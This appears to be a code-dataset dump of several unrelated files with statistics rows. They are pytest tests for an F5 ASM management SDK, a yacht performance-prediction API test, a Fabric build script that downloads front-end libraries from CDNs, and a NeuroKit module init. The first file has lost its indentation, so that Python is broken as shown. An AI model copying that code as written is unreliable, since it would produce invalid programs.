mgmt_root.tm.asm.tasks.export_policy_s.export_policy.load(id=hashid)
assert err.value.response.status_code == 404
def test_policy_export_collection(self, export_policy, mgmt_root):
exp1 = export_policy
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-policy/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-policy:export-policy-taskstate'
assert exp1.inline is False
sc = mgmt_root.tm.asm.tasks.export_policy_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Export_Policy)
class TestImportPolicy(object):
def test_create_req_arg(self, import_policy):
imp1 = import_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
def test_create_import_template(self, import_policy_template):
imp1 = import_policy_template
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
def test_create_import_partitioned(self, mgmt_root, import_partitioned_policy):
imp1 = import_partitioned_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
remove_policies(mgmt_root, os.path.basename(imp1.fullPath))
def test_create_import_partitioned2(self, mgmt_root, import_partitioned_policy2):
imp1 = import_partitioned_policy2
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
remove_policies(mgmt_root, os.path.basename(imp1.fullPath))
def test_create_import_fails(self, import_policy_base64):
imp1 = import_policy_base64
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.status == 'FAILURE'
def test_create_optional_args(self, mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
imp1 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
isBase64=True,
name=name
)
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri+endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'NEW'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is True
def test_refresh(self, import_policy, mgmt_root):
imp1 = import_policy
imp2 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
imp1.refresh()
assert imp1.selfLink == imp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, import_policy, mgmt_root):
imp1 = import_policy
imp2 = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
def test_delete(self, mgmt_root):
content = file_read()
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
task = mgmt_root.tm.asm.tasks.import_policy_s.import_policy.create(
file=content,
name=name
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hash_id = task.id
task.delete()
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.import_policy_s.import_policy.load(
id=hash_id
)
assert err.value.response.status_code == 404
def test_policy_import_collection(self, import_policy, mgmt_root):
imp1 = import_policy
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-policy/'
final_uri = base_uri+endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-policy:import-policy-taskstate'
assert imp1.isBase64 is False
sc = mgmt_root.tm.asm.tasks.import_policy_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Import_Policy)
class TestCheckSignature(object):
def test_fetch(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/check-signatures/'
final_uri = base_uri + endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status == 'NEW'
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:check-signatures:check-signatures-taskstate'
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.load(
id='Lx3553-321'
)
assert err.value.response.status_code == 404
def test_load(self, check_sig, mgmt_root):
chk1 = check_sig
hashid = str(chk1.id)
t1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.load(id=hashid)
assert t1.id == chk1.id
assert t1.selfLink == chk1.selfLink
def test_exists(self, check_sig):
chk1 = check_sig
hashid = str(chk1.id)
assert chk1.exists(id=hashid)
def test_refresh(self, check_sig):
chk1 = check_sig
hashid = str(chk1.id)
link = chk1.selfLink
chk1.refresh()
assert chk1.id == hashid
assert chk1.selfLink == link
def test_delete(self, mgmt_root):
task = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
task.delete()
assert task.__dict__['deleted']
def test_signature_update_collection(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/check-signatures/'
final_uri = base_uri+endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status == 'NEW'
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:check-signatures:check-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.check_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Check_Signature)
class TestExportSignature(object):
def test_create_req_arg(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri+endpoint
assert exp1.filename == name + '.xml'
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'NEW'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
assert exp1.inline is False
def test_create_optional_args(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml',
inline=True
)
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri + endpoint
assert exp1.filename == name + '.xml'
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'NEW'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
assert exp1.inline is True
def test_refresh(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
exp2 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
exp1.refresh()
assert exp1.selfLink == exp2.selfLink
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, export_basic, mgmt_root):
exp1 = export_basic
exp2 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(id=exp1.id)
assert exp1.selfLink == exp2.selfLink
def test_delete(self, mgmt_root):
file = tempfile.NamedTemporaryFile()
name = os.path.basename(file.name)
exp1 = mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.create(
filename=name + '.xml'
)
hashid = str(exp1.id)
exp1.delete()
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.export_signatures_s.export_signature.load(
id=hashid
)
assert err.value.response.status_code == 404
def test_signature_export_collection(self, export_basic, mgmt_root):
exp1 = export_basic
endpoint = str(exp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/export-signatures/'
final_uri = base_uri + endpoint
assert exp1.selfLink.startswith(final_uri)
assert exp1.status == 'COMPLETED'
assert exp1.kind == 'tm:asm:tasks:export-signatures:export-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.export_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Export_Signature)
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('12.0.0'),
reason='This collection is completely broken on 11.6.0.'
)
class TestUpdateSignature(object):
def test_fetch(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/update-signatures/'
final_uri = base_uri+endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status in ['COMPLETED', 'NEW']
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:update-signatures:update-signatures-taskstate'
def test_load_no_object(self, mgmt_root):
with pytest.raises(HTTPError) as err:
mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.load(
id='Lx3553-321'
)
assert err.value.response.status_code == 404
def test_load(self, update_sig, mgmt_root):
chk1 = update_sig
hashid = str(chk1.id)
time.sleep(6)
t1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.load(id=hashid)
assert t1.id == chk1.id
assert t1.selfLink == chk1.selfLink
def test_exists(self, update_sig):
chk1 = update_sig
hashid = str(chk1.id)
assert chk1.exists(id=hashid)
def test_refresh(self, update_sig):
chk1 = update_sig
hashid = str(chk1.id)
link = chk1.selfLink
chk1.refresh()
assert chk1.id == hashid
assert chk1.selfLink == link
def test_delete(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.check_signatures_s.check_signature.fetch()
chk1.delete()
assert chk1.__dict__['deleted']
def test_signature_update_collection(self, mgmt_root):
chk1 = mgmt_root.tm.asm.tasks.update_signatures_s.update_signature.fetch()
endpoint = str(chk1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/update-signatures/'
final_uri = base_uri + endpoint
assert hasattr(chk1, 'id')
assert hasattr(chk1, 'status')
assert hasattr(chk1, 'selfLink')
assert not hasattr(chk1, 'generation')
assert chk1.status in ['COMPLETED', 'NEW']
assert chk1.selfLink.startswith(final_uri)
assert chk1.kind == 'tm:asm:tasks:update-signatures:update-signatures-taskstate'
sc = mgmt_root.tm.asm.tasks.update_signatures_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Update_Signature)
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestImportVulnerabilities(object):
def test_modify_raises(self, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(UnsupportedOperation):
rc.import_vulnerabilities.modify()
def test_create_mandatory_arg_missing(self, mgmt_root, set_policy):
reference = {'link': set_policy}
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
with pytest.raises(MissingRequiredCreationParameter) as err:
rc.import_vulnerabilities.create(
filename=file.name,
policyReference=reference
)
assert 'This resource requires at least one of the' in str(err.value)
def test_create_req_arg(self, import_vuln):
imp1 = import_vuln
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-vulnerabilities/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-vulnerabilities:import-vulnerabilities-taskstate'
assert imp1.importAllDomainNames is True
def test_refresh(self, import_vuln, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
imp1 = import_vuln
imp2 = rc.import_vulnerabilities.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
imp1.refresh()
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
def test_load_no_object(self, mgmt_root):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(HTTPError) as err:
rc.import_vulnerabilities.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, mgmt_root, import_vuln):
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
imp1 = import_vuln
imp2 = rc.import_vulnerabilities.load(id=imp1.id)
assert imp1.selfLink == imp2.selfLink
assert imp1.importAllDomainNames == imp2.importAllDomainNames
def test_delete(self, mgmt_root, set_policy):
reference = {'link': set_policy}
imports = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
content = file_read()
file = tempfile.NamedTemporaryFile()
fh = open(file.name, 'w')
fh.write(content)
fh.close()
mgmt_root.tm.asm.file_transfer.uploads.upload_file(file.name)
task = imports.import_vulnerabilities.create(
filename=file.name,
policyReference=reference,
importAllDomainNames=True
)
while True:
task.refresh()
if task.status in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
hashid = str(task.id)
task.delete()
rc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s
with pytest.raises(HTTPError) as err:
rc.import_vulnerabilities.load(id=hashid)
assert err.value.response.status_code == 404
def test_import_vuln_collection(self, mgmt_root, import_vuln):
imp1 = import_vuln
endpoint = str(imp1.id)
base_uri = 'https://localhost/mgmt/tm/asm/tasks/import-vulnerabilities/'
final_uri = base_uri + endpoint
assert imp1.selfLink.startswith(final_uri)
assert imp1.status == 'COMPLETED'
assert imp1.kind == 'tm:asm:tasks:import-vulnerabilities:import-vulnerabilities-taskstate'
assert imp1.importAllDomainNames is True
sc = mgmt_root.tm.asm.tasks.import_vulnerabilities_s.get_collection()
assert isinstance(sc, list)
assert len(sc)
assert isinstance(sc[0], Import_Vulnerabilities)
| 36.189369 | 98 | 0.658557 | 4,083 | 32,679 | 5.103355 | 0.065148 | 0.048375 | 0.052311 | 0.040553 | 0.864184 | 0.854154 | 0.842684 | 0.82032 | 0.784134 | 0.779431 | 0 | 0.017976 | 0.235656 | 32,679 | 902 | 99 | 36.22949 | 0.816238 | 0.016892 | 0 | 0.731362 | 0 | 0 | 0.104976 | 0.038366 | 0 | 0 | 0 | 0 | 0.209512 | 1 | 0.092545 | false | 0 | 0.134961 | 0 | 0.237789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7551270451f7f94b2a01c04c1fbe6e3d0ec016ca | 5,633 | py | Python | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 11 | 2020-06-03T15:06:03.000Z | 2022-02-05T19:01:33.000Z | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 2 | 2020-06-03T15:24:51.000Z | 2020-10-24T21:21:28.000Z | test/testapi.py | sailingfree/Python-VPP | c4730494ae86dc78260ccd94fe05c85141760360 | [
"MIT"
] | 8 | 2020-06-07T18:28:34.000Z | 2021-08-20T16:55:29.000Z | import requests
import json
import os, sys
import numpy as np
sys.path.append(os.path.realpath("."))
from src.YachtMod import Yacht, Keel, Rudder
from src.SailMod import Main, Jib, Kite
from src.VPPMod import VPP
def test_interaction():
"""Test interaction between api and request by asking to sum arguments."""
url = "http://0.0.0.0:5000/api/sum/"
data = [
[14.34, 1.68, 2.7, 25.0, 98.0, 2.8, 1.31, 0.53, 2.7, 13.0, 0.57, 1.96, 660.0]
]
j_data = json.dumps(data)
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
r = requests.post(url, data=j_data, headers=headers)
print(r, r.text)
def test_local_vpp_solution():
"""
Return the dictionary produced by the VPP from an API call.
Pass the list of parameters as a dictionary.
Receive the results as a dictionary.
"""
Keel1 = Keel(Cu=1.00, Cl=0.78, Span=1.90)
Rudder1 = Rudder(Cu=0.48, Cl=0.22, Span=1.15)
YD41 = Yacht(
Name="YD41",
Lwl=11.90,
Vol=6.05,
Bwl=3.18,
Tc=0.4,
WSA=28.20,
Tmax=2.30,
Amax=1.051,
Mass=6500,
Ff=1.5,
Fa=1.5,
Boa=4.2,
Loa=12.5,
App=[Keel1, Rudder1],
Sails=[
Main(P=16.60, E=5.60, Roach=0.1, BAD=1.0),
Jib(I=16.20, J=5.10, LPG=5.40, HBI=1.8),
Kite(area=150.0, vce=9.55),
],
)
yacht = dict(
{
"Name": "YD41",
"Lwl": 11.90,
"Vol": 6.05,
"Bwl": 3.18,
"Tc": 0.4,
"WSA": 28.20,
"Tmax": 2.30,
"Amax": 1.051,
"Mass": 6500,
"Ff": 1.5,
"Fa": 1.5,
"Boa": 4.2,
"Loa": 12.5,
}
)
keel = dict({"Cu": 1.00, "Cl": 0.78, "Span": 1.90})
rudder = dict({"Cu": 0.48, "Cl": 0.22, "Span": 1.15})
main = dict({"P": 16.60, "E": 5.60, "Roach": 0.1, "BAD": 1.0})
jib = dict({"I": 16.20, "J": 5.10, "LPG": 5.40, "HBI": 1.8})
kite = dict({"area": 150.0, "vce": 9.55})
tws_range = np.array([10.0]).tolist()
twa_range = [i for i in np.linspace(30.0, 180.0, 5)]
d = {
"name": yacht["Name"],
"yacht": yacht,
"keel": keel,
"rudder": rudder,
"main": main,
"jib": jib,
"kite": kite,
"tws_range": tws_range,
"twa_range": twa_range,
}
json_string = json.dumps(d)
url = "http://0.0.0.0:5000/api/vpp/"
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
response = requests.post(url, data=json_string, headers=headers).json()
vpp = VPP(Yacht=YD41)
vpp.set_analysis(
tws_range=np.array([10.0]), twa_range=np.linspace(30.0, 180.0, 5),
)
vpp.run(verbose=True)
results = vpp.result()
print(results["tws"] == response["tws"])
print(results["twa"] == response["twa"])
print(
np.isclose(results["perf"], response["perf"], rtol=0.1)
) # the results aren't always repeatable beyond 0.1 d.p.
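
# Hedged alternative (not in the original test suite): the checks above only print
# their comparisons, so a mismatch would not fail under pytest. A helper like this
# could be called instead to assert on the same quantities.
def _assert_vpp_results_match(results, response):
    assert np.array_equal(results["tws"], response["tws"])
    assert np.array_equal(results["twa"], response["twa"])
    assert np.isclose(results["perf"], response["perf"], rtol=0.1).all()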
def test_remote_vpp_solution():
"""
Return the dictionary produced by the VPP from an API call.
Pass the list of parameters as a dictionary.
Receive the results as a dictionary.
"""
Keel1 = Keel(Cu=1.00, Cl=0.78, Span=1.90)
Rudder1 = Rudder(Cu=0.48, Cl=0.22, Span=1.15)
YD41 = Yacht(
Name="YD41",
Lwl=11.90,
Vol=6.05,
Bwl=3.18,
Tc=0.4,
WSA=28.20,
Tmax=2.30,
Amax=1.051,
Mass=6500,
Ff=1.5,
Fa=1.5,
Boa=4.2,
Loa=12.5,
App=[Keel1, Rudder1],
Sails=[
Main(P=16.60, E=5.60, Roach=0.1, BAD=1.0),
Jib(I=16.20, J=5.10, LPG=5.40, HBI=1.8),
Kite(area=150.0, vce=9.55),
],
)
yacht = dict(
{
"Name": "YD41",
"Lwl": 11.90,
"Vol": 6.05,
"Bwl": 3.18,
"Tc": 0.4,
"WSA": 28.20,
"Tmax": 2.30,
"Amax": 1.051,
"Mass": 6500,
"Ff": 1.5,
"Fa": 1.5,
"Boa": 4.2,
"Loa": 12.5,
}
)
keel = dict({"Cu": 1.00, "Cl": 0.78, "Span": 1.90})
rudder = dict({"Cu": 0.48, "Cl": 0.22, "Span": 1.15})
main = dict({"P": 16.60, "E": 5.60, "Roach": 0.1, "BAD": 1.0})
jib = dict({"I": 16.20, "J": 5.10, "LPG": 5.40, "HBI": 1.8})
kite = dict({"area": 150.0, "vce": 9.55})
tws_range = np.array([10.0]).tolist()
twa_range = [i for i in np.linspace(30.0, 180.0, 5)]
d = {
"name": yacht["Name"],
"yacht": yacht,
"keel": keel,
"rudder": rudder,
"main": main,
"jib": jib,
"kite": kite,
"tws_range": tws_range,
"twa_range": twa_range,
}
json_string = json.dumps(d)
url = "http://python-vpp-api.herokuapp.com/api/vpp/"
headers = {"content-type": "application/json", "Accept-Charset": "UTF-8"}
response = requests.post(url, data=json_string, headers=headers).json()
vpp = VPP(Yacht=YD41)
vpp.set_analysis(
tws_range=np.array([10.0]), twa_range=np.linspace(30.0, 180.0, 5),
)
vpp.run(verbose=True)
results = vpp.result()
print(results["tws"] == response["tws"])
print(results["twa"] == response["twa"])
print(
np.isclose(results["perf"], response["perf"], rtol=0.1)
) # the results aren't always repeatable beyond 0.1 d.p.
if __name__ == "__main__":
# test_interaction()
# test_local_vpp_solution()
test_remote_vpp_solution()
| 27.612745 | 85 | 0.499024 | 850 | 5,633 | 3.252941 | 0.201176 | 0.00868 | 0.00434 | 0.010127 | 0.83038 | 0.83038 | 0.83038 | 0.83038 | 0.820976 | 0.802893 | 0 | 0.12069 | 0.310137 | 5,633 | 203 | 86 | 27.748768 | 0.590839 | 0.090183 | 0 | 0.784431 | 0 | 0 | 0.113178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017964 | false | 0 | 0.041916 | 0 | 0.05988 | 0.041916 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f32e759f4045c5119734de5082dff62b6bb8d513 | 3,383 | py | Python | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | 7 | 2016-11-13T19:08:00.000Z | 2020-03-27T04:38:25.000Z | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | null | null | null | _blog_stuff/markdownplus/fabfile.py | draapho/Blog | 599ff2ec00a7fc17974df39db53d372e1697fe70 | [
"MIT"
] | 3 | 2018-05-17T05:47:17.000Z | 2021-02-18T08:19:05.000Z | from fabric.api import local
def css():
    local('cp -r node_modules/markdown-core/dist/*.css dist/')
    local('cp -r node_modules/markdown-core/dist/fonts dist/')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.css > dist/markdown-plus.css')
    local('curl https://cdn.jsdelivr.net/jquery.layout/1.4.3/layout-default.css >> dist/markdown-plus.css')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal.min.css >> dist/markdown-plus.css')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal-default-theme.min.css >> dist/markdown-plus.css')
    local('cat dist/markdown-core.min.css >> dist/markdown-plus.css')
    local('rm dist/markdown-core.min.css')
    local('cat markdown-plus.css >> dist/markdown-plus.css')
    local('cleancss -o dist/markdown-plus.min.css dist/markdown-plus.css')
    local('rm dist/markdown-plus.css')

def js():
    local('curl https://cdn.jsdelivr.net/underscorejs/1.8.3/underscore-min.js > dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('cat node_modules/markdown-core/dist/markdown-core.min.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdn.jsdelivr.net/jquery.layout/1.4.3/jquery.layout.min.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/remodal/1.1.0/remodal.min.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/ace.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/keybinding-vim.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/keybinding-emacs.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/mode-markdown.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/ext-searchbox.js >> dist/markdown-plus.js')
    for theme in ['tomorrow_night_eighties', 'tomorrow_night_blue', 'tomorrow', 'kuroir']:
        local('echo "\n" >> dist/markdown-plus.js')
        local('curl https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.5/theme-{0}.js >> dist/markdown-plus.js'.format(theme))
    local('echo "\n" >> dist/markdown-plus.js')
    local('cat sync_scroll.js >> dist/markdown-plus.js')
    local('echo "\n" >> dist/markdown-plus.js')
    local('cat markdown-plus.js >> dist/markdown-plus.js')
    local('uglifyjs dist/markdown-plus.js -cmo dist/markdown-plus.min.js')
    local('rm dist/markdown-plus.js')

def dist():
    local('rm -rf node_modules')
    local('npm install')
    css()
    js()

def mdp():
    local('cp -rf dist ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
    local('cp -f index.html ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
    local('cp -f icon.png ~/src/swift/markdown-plus/Markdown\ Plus/markdown-plus/')
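
# Usage sketch (assumption, not stated in the original fabfile): with Fabric 1.x
# installed, the build can be driven from the shell, e.g.
#   fab dist    # reinstall node_modules, then rebuild the dist/ CSS and JS bundles
#   fab css js  # rebuild only the bundles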
| 56.383333 | 126 | 0.683121 | 540 | 3,383 | 4.262963 | 0.15 | 0.250217 | 0.257168 | 0.211121 | 0.807124 | 0.754996 | 0.732407 | 0.706342 | 0.65682 | 0.631625 | 0 | 0.01502 | 0.114396 | 3,383 | 59 | 127 | 57.338983 | 0.753338 | 0 | 0 | 0.235294 | 0 | 0.352941 | 0.775643 | 0.325155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.019608 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
f3c7e4cb5ec68e67de5cc67bcf6c26ca4ec02187 | 129 | py | Python | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | 1 | 2020-05-26T09:46:57.000Z | 2020-05-26T09:46:57.000Z | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | null | null | null | neurokit2/eeg/__init__.py | purpl3F0x/NeuroKit | bd41f2bf7692bc8ed4c85608daa535293a33a1d6 | [
"MIT"
] | 1 | 2020-10-27T06:47:51.000Z | 2020-10-27T06:47:51.000Z | """Submodule for NeuroKit."""
from .mne_channel_add import mne_channel_add
from .mne_channel_extract import mne_channel_extract
| 25.8 | 52 | 0.837209 | 19 | 129 | 5.263158 | 0.473684 | 0.4 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 129 | 4 | 53 | 32.25 | 0.854701 | 0.178295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
